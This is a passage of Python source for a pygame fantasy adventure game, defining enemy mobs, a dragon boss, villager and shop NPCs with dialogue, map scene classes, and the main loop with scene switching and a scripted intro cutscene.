        self.left_states = {0: (96, 128, 88, 60), 1: (194, 126, 92, 60), 2: (290, 128, 88, 58)}
        self.right_states = {0: (6, 226, 88, 58), 1: (98, 224, 92, 60), 2: (200, 226, 88, 60)}
        self.up_states = {0: (124, 300, 42, 84), 1: (220, 296, 42, 86), 2: (316, 300, 42, 84)}
        self.down_states = {0: (122, 14, 46, 80), 1: (218, 8, 46, 86), 2: (314, 14, 46, 80)}
        # NOTE(review): the original assigned `facing` and then immediately
        # overwrote it with 'down', so the argument has no lasting effect.
        self.direction = 'down'
        self.movespeed = 1.45
        self.health = 1.5
        self.sound = wolfsound
        self.deathsound = 0
        self.value = 4
class Scorpion(EnemyMob):
    """Desert scorpion: mid-speed mob worth 2 coins."""
    def __init__(self, position, facing):
        self.group = scorpions
        self.groups = all_sprites, scorpions
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = scorpion
        self.sheet.set_clip(pg.Rect(78, 0, 36, 64))
        self.frame = 0
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Sprite-sheet clip rectangles per animation frame.
        self.left_states = {0: (0, 114, 64, 54), 1: (64, 114, 64, 54), 2: (128, 114, 64, 54)}
        self.right_states = {0: (0, 170, 64, 54), 1: (63, 170, 64, 54), 2: (128, 170, 64, 54)}
        self.up_states = {0: (0, 68, 50, 44), 1: (50, 68, 50, 44), 2: (100, 68, 50, 44)}
        self.down_states = {0: (0, 0, 64, 64), 1: (64, 0, 64, 66), 2: (128, 0, 64, 64)}
        # NOTE(review): the original assigned `facing` and then immediately
        # overwrote it with 'down', so the argument has no lasting effect.
        self.direction = 'down'
        self.movespeed = 1.77
        self.health = 0.75
        self.sound = scorpionsound
        self.deathsound = 0
        self.value = 2
class Dragon(EnemyMob):
    """Boss enemy: slow, 900-health dragon that shoots fireballs and
    enrages (faster, constant fire) below 250 health."""
    def __init__(self, position, facing, mode):
        self.group = dragons
        self.groups = all_sprites, dragons
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = dragon
        self.sheet.set_clip(pg.Rect(126, 11, 58, 30))
        self.frame = 0
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Sprite-sheet clip rectangles per animation frame.
        self.left_states = {0: (0, 97, 97, 98), 1: (97, 97, 98, 98), 2: (195, 97, 94, 98)}
        self.right_states = {0: (0, 195, 97, 97), 1: (97, 195, 98, 97), 2: (198, 195, 94, 97)}
        self.up_states = {0: (3, 293, 94, 97), 1: (101, 292, 94, 97), 2: (198, 292, 94, 97)}
        self.down_states = {0: (3, 0, 94, 97), 1: (101, 0, 94, 97), 2: (198, 0, 94, 97)}
        self.direction = facing
        self.movespeed = 1.05
        # NOTE(review): kept from the original — `facing` is immediately
        # overwritten, so the dragon always starts facing down.
        self.direction = 'down'
        self.health = 900
        self.sound = dragonsound
        self.deathsound = 0
        self.last_shot = 0
        self.firespeed = 100
        self.value = 100
    def fire(self, playerrect):
        """Shoot a fireball when alive and the player is aligned with the
        dragon on either axis.

        Bug fix: the original condition parsed as
        (alive AND horizontally aligned) OR (vertically aligned), so a dead
        dragon kept firing whenever the player was vertically aligned. The
        health guard now applies to both alignment cases.
        """
        aligned = (self.rect.left <= playerrect.centerx <= self.rect.right
                   or self.rect.top <= playerrect.centery <= self.rect.bottom)
        if self.health > 0 and aligned:
            Fireball(self.rect.centerx, self.rect.centery, self.direction)
    def anger(self):
        """Enrage phase: below 250 health, speed up and fire on every call."""
        if 0 < self.health < 250:
            self.movespeed = 3.7
            Fireball(self.rect.centerx, self.rect.centery, self.direction)
    def lower_health(self, value):
        """Reduce health by `value` plus a flat 5 (matches the player's rule)."""
        self.health -= (value + 5)
#Dragon for Intro
class Startdragon(EnemyMob):
    """Weakened dragon used in the intro cutscene; `mode` scripts its path."""
    def __init__(self, position, facing, mode):
        self.group = starterdragon
        self.groups = all_sprites, starterdragon
        pg.sprite.Sprite.__init__(self, self.groups)
        self.sheet = dragon
        self.sheet.set_clip(pg.Rect(126, 11, 58, 30))
        self.frame = 0
        self.image = self.sheet.subsurface(self.sheet.get_clip())
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        # Sprite-sheet clip rectangles per animation frame.
        self.left_states = {0: (0, 97, 97, 98), 1: (97, 97, 98, 98), 2: (195, 97, 94, 98)}
        self.right_states = {0: (0, 195, 97, 97), 1: (97, 195, 98, 97), 2: (198, 195, 94, 97)}
        self.up_states = {0: (3, 293, 94, 97), 1: (101, 292, 94, 97), 2: (198, 292, 94, 97)}
        self.down_states = {0: (3, 0, 94, 97), 1: (101, 0, 94, 97), 2: (198, 0, 94, 97)}
        # NOTE(review): the original assigned `facing` and then immediately
        # overwrote it with 'down', so the argument has no lasting effect.
        self.direction = 'down'
        self.movespeed = 1.5
        self.health = 2.8
        self.mode = mode
        self.sound = dragonsound

    def movement(self):
        """Scripted intro movement: mode 2 turns the dragon left."""
        if self.mode == 2:
            self.direction = 'left'
#Standing Villager
class FriendlySpriteOne(pg.sprite.Sprite):
    """Standing villager in town who hints that something is up north."""
    def __init__(self):
        self.groups = all_sprites, friendly_one
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = standingsprite
        self.rect = self.image.get_rect()
        self.rect.topleft = (495, 250)
        # Value passed to message_display for the proximity prompt —
        # presumably a display duration; TODO confirm units against message_display.
        self.msgtimer = 3.9
    def handle_event(self, playersrect, events, girldir, playerquest):
        """Show dialogue on click/proximity and mirror the walking NPC's facing."""
        # NOTE(review): the loop variable is unused — the body repeats once per
        # sprite in `character` (presumably exactly one player sprite).
        for characterone in character:
            if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
                self.msgtimer = 3.9
                # questlvl 5 is the "son is dead" intro phase (see game_loop).
                if playerquest == 5:
                    message_display('I am so sorry...', 19, 600, black)
                else:
                    message_display('Hey! Rumour has it there is something up north...', 17, 650, black)
            elif self.rect.colliderect(playersrect):
                self.msgtimer = 3.91
                message_display('Click the mouse to talk!', 20, self.msgtimer, black)
            # Swap pose to face up when the walking NPC (girldir) heads up.
            if girldir == 'up':
                self.image = standingspritetwo
            else:
                self.image = standingsprite
#Standing Villager Two
class FriendlySpriteFour(pg.sprite.Sprite):
    """Quest-giving villager: asks the player to fetch a desert flower.

    The conversation advances one line per click via ``convonum``. Once
    ``completed`` is set externally (game_loop sets it when the flower is
    picked up), the next click grants the boot reward via ``upgrade``.
    """
    def __init__(self, position):
        self.groups = all_sprites, friendly_four
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = standertwo
        self.rect = self.image.get_rect()
        self.rect.topleft = position
        self.msgtimer = 3.9
        self.completed = False  # set externally once the flower is collected
        self.convonum = 0       # index of the next conversation line
        self.two = 0            # 1 after the reward line has been shown once
        self.upgrade = False    # True once the boot reward is granted
        # Fix: `quest` was previously only assigned inside handle_event
        # (convonum == 2 branch), so reading it earlier raised AttributeError.
        self.quest = False
    def handle_event(self, playersrect, events, playerquest):
        """Show the appropriate dialogue line for a click or proximity."""
        # NOTE(review): the loop variable is unused — the body repeats once per
        # sprite in `character` (presumably exactly one player sprite).
        for characterone in character:
            if events.type == pg.MOUSEBUTTONDOWN and self.rect.colliderect(playersrect):
                self.msgtimer = 3.9
                if playerquest == 5:
                    message_display('Such a shame what happened to your son.', 17, 700, black)
                elif self.completed == True and self.two == 1:
                    message_display('I am in your debt forever.', 19, 650, black)
                elif self.completed == True:
                    # First click after quest completion: hand out the reward.
                    self.two = 1
                    self.upgrade = True
                    message_display('Thanks! Here is a pair of boots to travel faster!', 16, 650, black)
                    upgradesound.play()
                else:
                    # Quest not yet complete: advance the scripted conversation.
                    if self.convonum == 0:
                        message_display('Please, I need your help urgently!', 18, 550, black)
                        self.convonum += 1
                    elif self.convonum == 1:
                        message_display('My brother is sick and needs a rare desert flower!', 17, 760, black)
                        self.convonum += 1
                    elif self.convonum == 2:
                        self.quest = True
                        message_display('If you succeed I will give you an award!', 17, 650, black)
                        self.convonum += 1
                    elif self.convonum == 3 and self.completed != True:
                        message_display('What are you doing? Please find the flower!', 17, 600, black)
            elif self.rect.colliderect(playersrect):
                self.msgtimer = 3.91
                message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Shop Keeper
class Shop(pg.sprite.Sprite):
    """The shop keeper NPC standing inside the potion/shovel shop."""
    def __init__(self, position):
        self.groups = all_sprites, shop_keeper
        pg.sprite.Sprite.__init__(self, self.groups)
        self.image = shopimg
        self.rect = self.image.get_rect(topleft=position)
        self.msgtimer = 3.9
    def handle_event(self, playersrect, events, playerquest):
        """Show the sales pitch on click, or a talk prompt on proximity."""
        for _ in character:
            touching = self.rect.colliderect(playersrect)
            if events.type == pg.MOUSEBUTTONDOWN and touching:
                self.msgtimer = 3.9
                message_display('I sell healing potions and shovels for good prices.', 17, 650, black)
            elif touching:
                self.msgtimer = 3.91
                message_display('Click the mouse to talk!', 20, self.msgtimer, black)
#Map classes
class GameSceneOne(SceneBase, Hero):
    """Scene for tilemapone — paired with the 'town' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapone)
class GameSceneTwo(SceneBase, Hero):
    """Scene for tilemaptwo — paired with the 'northriver' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemaptwo)
class GameSceneThree(SceneBase, Hero):
    """Scene for tilemapthree — paired with the 'eastplains' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapthree)
class GameSceneFour(SceneBase, Hero):
    """Scene for tilemapfour — paired with the 'heartcave' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapfour)
class GameSceneFive(SceneBase, Hero):
    """Scene for tilemapfive — paired with the 'dragonone' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapfive)
class GameSceneSix(SceneBase, Hero):
    """Scene for tilemapsix — paired with the 'desert' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapsix)
class GameSceneSeven(SceneBase, Hero):
    """Scene for tilemapseven — paired with the 'dragonentrance' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapseven)
class GameSceneEight(SceneBase, Hero):
    """Scene for tilemapeight — paired with the 'dragoncave' (boss) location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapeight)
class GameSceneNine(SceneBase, Hero):
    """Scene for tilemapnine — paired with the 'farplains' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapnine)
class GameSceneTen(SceneBase, Hero):
    """Scene for tilemapten — paired with the 'westdesert' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapten)
class GameSceneEleven(SceneBase, Hero):
    """Scene for tilemapeleven — paired with the 'eastdesert' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapeleven)
class GameSceneTwelve(SceneBase, Hero):
    """Scene for tilemaptwelve — paired with the 'southdesert' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemaptwelve)
class GameSceneThirteen(SceneBase, Hero):
    """Scene for tilemapthirteen — paired with the 'houseone' (shop) location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapthirteen)
class GameSceneFourteen(SceneBase, Hero):
    """Scene for tilemapfourteen — paired with the 'housetwo' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapfourteen)
class GameSceneFifteen(SceneBase, Hero):
    """Scene for tilemapfifteen — paired with the 'housethree' location in game_loop."""
    def __init__(self):
        SceneBase.__init__(self)
    def Render(self, screen, x, y):
        # screen/x/y are accepted but unused; drawing goes through the helper.
        displayBackground(tilemapfifteen)
#Main GAME LOOP
def game_loop(startx, starty, startone, starttwo, starting_scene):
    """Run the main game loop.

    Builds the player, NPCs, enemies, pickups and HUD bars once, then loops
    every frame: polls input events, clamps the player against map walls,
    switches scenes/maps based on position and the player's location tag,
    plays the scripted intro (questlvl 0-8), draws and updates every sprite
    group for the current map, applies contact/fireball damage, renders the
    HUD, and refreshes the display at FPS.

    Args:
        startx, starty: initial pixel position for the Hero sprite.
        startone, starttwo: initial pixel position for FriendlySpriteTwo.
        starting_scene: the scene object rendered first (town map).
    """
    global pause, controls
    active_scene = starting_scene
    x = startx
    y = starty
    # --- one-time world construction: player, NPCs, enemies, items, HUD ---
    player = Hero((x, y))
    friendlymobtwo = FriendlySpriteTwo((startone, starttwo))
    shop_owner = Shop((350, 460))
    walker_two = FriendlySpriteThree((570, 500))
    walker_two.update('left', player.rect)
    standing_sprite_two = FriendlySpriteFour((320, 400))
    new_flower = Flower((500, 500))
    batone = Bat((400, 400), 'left')
    battwo = Bat((240, 500), 'right')
    batthree = Bat((700, 400), 'up')
    slimeone = Slime((320, 320), 'down')
    slimetwo = Slime((640, 160), 'down')
    slimethree = Slime((650, 400), 'down')
    slimefour = Slime((880, 580), 'down')
    slimefive = Slime((400, 650), 'down')
    deerone = Deer((500, 500), 'down')
    deertwo = Deer((400, 500), 'down')
    deerthree = Deer((600, 500), 'down')
    wolfone = Wolf((500, 400), 'down')
    wolftwo = Wolf((600, 400), 'down')
    wolfthree = Wolf((500, 700), 'down')
    wolffour = Wolf((540, 200), 'down')
    scorpionone = Scorpion((430, 400), 'down')
    scorpiontwo = Scorpion((400, 410), 'down')
    scorpionthree = Scorpion((200, 400), 'down')
    scorpionfour = Scorpion((400, 500), 'down')
    dragonone = Dragon((600, 400), 'down', 1)
    dragontwo = Startdragon((1150, 360), 'left', 2)
    healthbar = Healthbar(player.health, (-28, 22))
    dragonhealthbar = DragonHealthbar(dragonone.health, (824, 22))
    boxofhealth = HealthBox((570, 175), 0)
    potionone = HealthPotion((90, 232))
    potiontwo = HealthPotion((123, 232))
    potionthree = HealthPotion((172, 232))
    potionfour = HealthPotion((203, 232))
    new_shovel = Shovel((415, 225))
    player.setLocation('town')
    # Per-mob-group counters so each group's sound plays at most twice
    # (four times for the boss dragon).
    batplayed = 0
    slimeplayed = 0
    deerplayed = 0
    dragonplayed = 0
    wolfplayed = 0
    scorpionplayed = 0
    upgradepotential = True
    message_timer = 0
    # One-shot purchase flags: four potions and the shovel in the shop.
    runone, runtwo, runthree, runfour, runfive = 0, 0, 0, 0, 0
    # Frame loop: runs until the active scene is cleared.
    while active_scene != None:
        #Slime death detection
        if slimes.sprites() == []:
            player.questlvl = 11
        for event in pg.event.get():
            if event.type == pg.QUIT:
                quitgame()
                active_scene.Terminate()
            elif event.type == pg.KEYDOWN:
                # Rate-limited magic shot, only after the intro gives the wand.
                if event.key == pg.K_SPACE and player.questlvl > 7:
                    now = pg.time.get_ticks()
                    if now - player.last_shot > player.firespeed:
                        player.last_shot = now
                        magicsound.play()
                        player.shoot()
                if event.key == pg.K_ESCAPE:
                    pause = True
                    game_pause(player.questlvl, player.wand, player.healthlvl, player.bootlvl)
                if event.key == pg.K_TAB:
                    player.heal(healthbar.rect)
                # Dig with a shovel at the buried-treasure spot in the south desert.
                if event.key == pg.K_d:
                    if player.get_location() == 'southdesert' and player.collisionrect.colliderect(pg.Rect(960, 640, 60, 60)) == True and player.num_of_shovels > 0:
                        player.num_of_shovels -= 1
                        message_display('You found 50 coins!', 17, 550, black)
                        player.num_of_coins += 50
        # NOTE(review): code below reuses the last polled `event` each frame;
        # presumably at least one event has fired before the NPC handlers run.
        #Walls for intro
        if player.questlvl <= 7 and player.get_location() == 'town':
            if player.collisionrect.right > 1120:
                player.collisionrect.right = 1120
                player.rect.right = player.collisionrect.right
            if player.collisionrect.left < 0:
                player.collisionrect.left = 0
                player.rect.left = player.collisionrect.left
            if player.collisionrect.top - 35 < 0:
                player.collisionrect.top = 35
                player.rect.top = player.collisionrect.top - 35
            if player.collisionrect.bottom > 880:
                player.collisionrect.bottom = 880
                player.rect.bottom = 880
                pg.mixer.music.stop()
                pg.mixer.music.load(songs[1])
                pg.mixer.music.play(-1)
        elif player.rect.top < 0 and player.get_location() == 'town':
            active_scene.SwitchToScene(GameSceneTwo())
            player.collisionrect.x = 505
            player.collisionrect.y = 845
            player.rect.x = player.collisionrect.x
            player.rect.y = player.collisionrect.y - 35
            player.setLocation('northriver')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[1])
            pg.mixer.music.play(-1)
        #Map switching detection
        if player.rect.bottom > display_height and player.get_location() == 'northriver':
            active_scene.SwitchToScene(GameSceneOne())
            clouds.empty()
            player.collisionrect.x = 505
            player.rect.y = 0
            player.rect.x = player.collisionrect.x
            player.collisionrect.y = player.rect.y + 35
            player.setLocation('town')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[0])
            pg.mixer.music.play(-1)
        if player.rect.right > display_width and player.get_location() == 'town':
            active_scene.SwitchToScene(GameSceneThree())
            clouds.empty()
            player.collisionrect.x = 1
            player.rect.x = player.collisionrect.x
            player.setLocation('eastplains')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[2])
            pg.mixer.music.play(-1)
        if player.rect.left < 0 and player.get_location() == 'eastplains':
            active_scene.SwitchToScene(GameSceneOne())
            clouds.empty()
            player.collisionrect.x = 1072
            player.rect.x = player.collisionrect.x
            player.setLocation('town')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[0])
            pg.mixer.music.play(-1)
        if player.rect.left < 0 and player.get_location() == 'town':
            active_scene.SwitchToScene(GameSceneFive())
            clouds.empty()
            player.collisionrect.x = 1072
            player.rect.x = player.collisionrect.x
            player.setLocation('dragonone')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[3])
            pg.mixer.music.play(-1)
        if player.rect.right > 1120 and player.get_location() == 'dragonone':
            active_scene.SwitchToScene(GameSceneOne())
            clouds.empty()
            player.collisionrect.x = 1
            # Keep the player's y only if it lines up with the town entrance gap.
            if player.collisionrect.y <= 560 and player.collisionrect.y >= 320:
                pass
            else:
                player.collisionrect.y = 430
                player.rect.y = player.collisionrect.y - 35
            player.rect.x = player.collisionrect.x
            player.setLocation('town')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[0])
            pg.mixer.music.play(-1)
        if player.rect.bottom > display_height and player.get_location() == 'town':
            active_scene.SwitchToScene(GameSceneSix())
            clouds.empty()
            player.collisionrect.x = 505
            player.rect.y = 0
            player.rect.x = player.collisionrect.x
            player.collisionrect.y = player.rect.y + 35
            player.setLocation('desert')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[2])
            pg.mixer.music.play(-1)
        if player.collisionrect.top - 35 < 0 and player.get_location() == 'desert':
            active_scene.SwitchToScene(GameSceneOne())
            clouds.empty()
            player.collisionrect.x = 505
            player.collisionrect.y = 845
            player.rect.x = player.collisionrect.x
            player.rect.y = player.collisionrect.y - 35
            player.setLocation('town')
            pg.mixer.music.stop()
            pg.mixer.music.load(songs[0])
            pg.mixer.music.play(-1)
        if player.collisionrect.left < 0 and player.get_location() == 'dragonone':
            active_scene.SwitchToScene(GameSceneSeven())
            clouds.empty()
            player.collisionrect.x = 1072
            player.rect.x = player.collisionrect.x
            player.setLocation('dragonentrance')
        if player.collisionrect.right > 1120 and player.get_location() == 'dragonentrance':
            active_scene.SwitchToScene(GameSceneFive())
            clouds.empty()
            player.collisionrect.x = 1
            player.rect.x = player.collisionrect.x
            player.setLocation('dragonone')
        if player.collisionrect.left < 0 and player.get_location() == 'dragonentrance':
            active_scene.SwitchToScene(GameSceneEight())
            clouds.empty()
            player.collisionrect.x = 1072
            player.rect.x = player.collisionrect.x
            player.setLocation('dragoncave')
        if player.rect.left < 0 and player.get_location() == 'farplains':
            active_scene.SwitchToScene(GameSceneThree())
            clouds.empty()
            player.collisionrect.x = 1072
            player.rect.x = player.collisionrect.x
            player.setLocation('eastplains')
        if player.collisionrect.right > 1120 and player.get_location() == 'eastplains':
            active_scene.SwitchToScene(GameSceneNine())
            clouds.empty()
            player.collisionrect.x = 1
            player.rect.x = player.collisionrect.x
            player.setLocation('farplains')
        if player.rect.left < 0 and player.get_location() == 'desert':
            active_scene.SwitchToScene(GameSceneTen())
            clouds.empty()
            player.collisionrect.x = 1072
            player.rect.x = player.collisionrect.x
            player.setLocation('westdesert')
        if player.collisionrect.right > 1120 and player.get_location() == 'westdesert':
            active_scene.SwitchToScene(GameSceneSix())
            clouds.empty()
            player.collisionrect.x = 1
            player.rect.x = player.collisionrect.x
            player.setLocation('desert')
        if player.collisionrect.right > 1120 and player.get_location() == 'desert':
            active_scene.SwitchToScene(GameSceneEleven())
            clouds.empty()
            player.collisionrect.x = 1
            player.rect.x = player.collisionrect.x
            player.setLocation('eastdesert')
        if player.rect.left < 0 and player.get_location() == 'eastdesert':
            active_scene.SwitchToScene(GameSceneSix())
            clouds.empty()
            player.collisionrect.x = 1072
            player.rect.x = player.collisionrect.x
            player.setLocation('desert')
        if player.rect.bottom > display_height and player.get_location() == 'desert':
            active_scene.SwitchToScene(GameSceneTwelve())
            clouds.empty()
            player.rect.y = 0
            player.collisionrect.y = player.rect.y + 35
            player.setLocation('southdesert')
        if player.collisionrect.top - 35 < 0 and player.get_location() == 'southdesert':
            active_scene.SwitchToScene(GameSceneSix())
            clouds.empty()
            player.collisionrect.y = 845
            player.rect.y = player.collisionrect.y - 35
            player.setLocation('desert')
        #Indoor / Outdoor Collision Detection
        if pg.sprite.spritecollideany(player, doors) != None:
            if player.collisionrect.colliderect(pg.Rect(160, 320, 80, 160)) == True and player.get_location() == 'town':
                if player.questlvl == 5:
                    message_display('The door appears to be locked.', 18, 600, black)
                else:
                    active_scene.SwitchToScene(GameSceneThirteen())
                    clouds.empty()
                    doorsound.play()
                    player.collisionrect.x = 260
                    player.rect.x = player.collisionrect.x
                    player.collisionrect.y = 550
                    player.rect.y = player.collisionrect.y - 35
                    player.setLocation('houseone')
                    message_display('Walk to the item you would like to purchase.', 16, 600, black)
            if player.collisionrect.colliderect(pg.Rect(240, 480, 80, 160)) == True and player.get_location() == 'town':
                active_scene.SwitchToScene(GameSceneFourteen())
                clouds.empty()
                doorsound.play()
                player.collisionrect.x = 340
                player.rect.x = player.collisionrect.x
                player.collisionrect.y = 625
                player.rect.y = player.collisionrect.y - 35
                player.setLocation('housetwo')
            if player.collisionrect.colliderect(pg.Rect(880, 560, 80, 160)) == True and player.get_location() == 'town':
                active_scene.SwitchToScene(GameSceneFifteen())
                clouds.empty()
                doorsound.play()
                player.collisionrect.x = 740
                player.rect.x = player.collisionrect.x
                player.collisionrect.y = 700
                player.rect.y = player.collisionrect.y - 35
                player.setLocation('housethree')
            if player.get_location() == 'houseone' and player.collisionrect.y > 570:
                active_scene.SwitchToScene(GameSceneOne())
                clouds.empty()
                player.collisionrect.x = 180
                player.rect.x = player.collisionrect.x
                player.collisionrect.y = 407
                player.rect.y = player.collisionrect.y - 35
                player.setLocation('town')
            if player.get_location() == 'housetwo' and player.collisionrect.y > 645:
                active_scene.SwitchToScene(GameSceneOne())
                clouds.empty()
                player.collisionrect.x = 262
                player.rect.x = player.collisionrect.x
                player.collisionrect.y = 560
                player.rect.y = player.collisionrect.y - 35
                player.setLocation('town')
            if player.get_location() == 'housethree' and player.collisionrect.y > 725:
                active_scene.SwitchToScene(GameSceneOne())
                clouds.empty()
                player.collisionrect.x = 900
                player.rect.x = player.collisionrect.x
                player.collisionrect.y = 750
                player.rect.y = player.collisionrect.y - 35
                player.setLocation('town')
        #Desert Lost Warning(s)
        if player.get_location() == 'southdesert':
            if player.collisionrect.right > 1120:
                player.collisionrect.right = 1120
                player.rect.right = player.collisionrect.right
            if player.collisionrect.left < 0:
                player.collisionrect.left = 0
                player.rect.left = player.collisionrect.left
            if player.collisionrect.bottom > 880:
                player.collisionrect.bottom = 880
                player.rect.bottom = 880
        if player.get_location() == 'eastdesert':
            if player.collisionrect.right > 1120:
                player.collisionrect.right = 1120
                player.rect.right = player.collisionrect.right
            if player.collisionrect.top - 35 < 0:
                player.collisionrect.top = 35
                player.rect.top = player.collisionrect.top - 35
            if player.collisionrect.bottom > 880:
                player.collisionrect.bottom = 880
                player.rect.bottom = 880
        if player.get_location() == 'westdesert':
            if player.collisionrect.left < 0:
                player.collisionrect.left = 0
                player.rect.left = player.collisionrect.left
            if player.collisionrect.top - 35 < 0:
                player.collisionrect.top = 35
                player.rect.top = player.collisionrect.top - 35
            if player.collisionrect.bottom > 880:
                player.collisionrect.bottom = 880
                player.rect.bottom = 880
        #Award for quest
        if friendlymobtwo.completed == True:
            player.firespeed = 150
            player.wand = 1
        #Son display
        if player.get_location() == 'town':
            GAMEDISPLAY.blit(son, (970, 640))
        #Bossfight Walls
        if player.get_location() == 'dragoncave':
            if player.collisionrect.right > 1120:
                player.collisionrect.right = 1120
                player.rect.right = player.collisionrect.right
            if player.collisionrect.left < 0:
                player.collisionrect.left = 0
                player.rect.left = player.collisionrect.left
            if player.collisionrect.top - 35 < 0:
                player.collisionrect.top = 35
                player.rect.top = player.collisionrect.top - 35
            if player.collisionrect.bottom > 880:
                player.collisionrect.bottom = 880
                player.rect.bottom = 880
        #Staircase detection heart cave
        if player.collisionrect.left < 50 and player.get_location() == 'northriver':
            active_scene.SwitchToScene(GameSceneFour())
            clouds.empty()
            play_stairsound()
            player.collisionrect.x = 1000
            player.collisionrect.y = 500
            player.rect.x = player.collisionrect.x
            player.rect.y = player.collisionrect.y - 35
            player.setLocation('heartcave')
        if player.collisionrect.right > 1090 and player.get_location() == 'heartcave':
            active_scene.SwitchToScene(GameSceneTwo())
            play_stairsound()
            player.collisionrect.x = 81
            player.collisionrect.y = 500
            player.rect.x = player.collisionrect.x
            player.rect.y = player.collisionrect.y - 35
            player.setLocation('northriver')
        #Class in-game-loop operations
        player.handle_event(event, player.direction)
        active_scene.Render(GAMEDISPLAY, x, y)
        active_scene = active_scene.next
        coins.update(player.collisionrect)
        coins.draw(GAMEDISPLAY)
        bullets.update()
        bullets.draw(GAMEDISPLAY)
        fireballs.update()
        fireballs.draw(GAMEDISPLAY)
        #Brother display
        if player.get_location() == 'housetwo':
            GAMEDISPLAY.blit(standerbrother, (495, 340))
        #Intro
        # Scripted intro cut-scene, driven by player.questlvl 0 -> 8:
        # the Startdragon flies across town, burns the son, and a mage
        # appears in a puff of smoke to hand the player the wand.
        starterdragon.draw(GAMEDISPLAY)
        if player.questlvl == 0:
            dragontwo.update('left')
            dragontwo.movement()
            if dragontwo.rect.x < 550 and dragontwo.rect.x > 540:
                player.questlvl = 1
        if player.questlvl == 1:
            message_display('Dragon: This world will crack under my wraith!', 20, 700, black)
            dragontwo.sound.play()
            player.questlvl = 2
        if player.questlvl == 2:
            dragontwo.movespeed = 5
            player.questlvl = 3
        dragontwo.update('left')
        dragontwo.movement()
        if dragontwo.rect.right < 0 and player.questlvl == 3:
            dragontwo.kill()
            player.questlvl = 4
        if player.questlvl == 4:
            message_display('Explore the town!', 23, 660, black)
            player.questlvl = 5
        if player.get_location() == 'town':
            GAMEDISPLAY.blit(son, (970, 640))
        if player.questlvl == 5:
            if player.collisionrect.left > 925 and player.collisionrect.top > 650 and player.collisionrect.bottom < 740:
                message_display('You: My son! The dragon must have done this!', 17, 800, black)
                for smo in smoke:
                    intro_images()
                    GAMEDISPLAY.blit(son, (970, 640))
                    GAMEDISPLAY.blit(smo, (855, 640))
                    GAMEDISPLAY.blit(firstpicture, (928, 640))
                    if smo == smoke[4] or smo == smoke[5]:
                        GAMEDISPLAY.blit(mage, (855, 640))
                    pg.display.update(pg.Rect(620, 580, 520, 140))
                    time.sleep(0.11)
                    if smo == smoke[5]:
                        player.questlvl = 6
        if player.questlvl == 6:
            intro_images()
            more_images()
            message_display('You: A mage! Can you revive him?', 21, 800, black)
            intro_images()
            more_images()
            message_display('Mage: I can not. The dragon took your son;', 22, 800, black)
            intro_images()
            more_images()
            message_display('Mage: It is your destiny to defeat him!', 24, 800, black)
            intro_images()
            more_images()
            message_display('Mage: Take this wand. Avenge your son! (SPACE to fire)', 17, 800, black)
            player.questlvl = 7
        if player.questlvl == 7:
            for smo in smoke:
                intro_images()
                GAMEDISPLAY.blit(son, (970, 640))
                GAMEDISPLAY.blit(smo, (855, 640))
                GAMEDISPLAY.blit(firstpicture, (928, 640))
                pg.display.update(pg.Rect(620, 580, 520, 140))
                time.sleep(0.11)
                if smo == smoke[5]:
                    player.questlvl = 8
        if player.questlvl == 8:
            intro_images()
            GAMEDISPLAY.blit(holdwand, (928, 640))
            pg.display.update(pg.Rect(620, 580, 520, 140))
            time.sleep(3)
            displayBackground(tilemapone)
            player.questlvl = 9
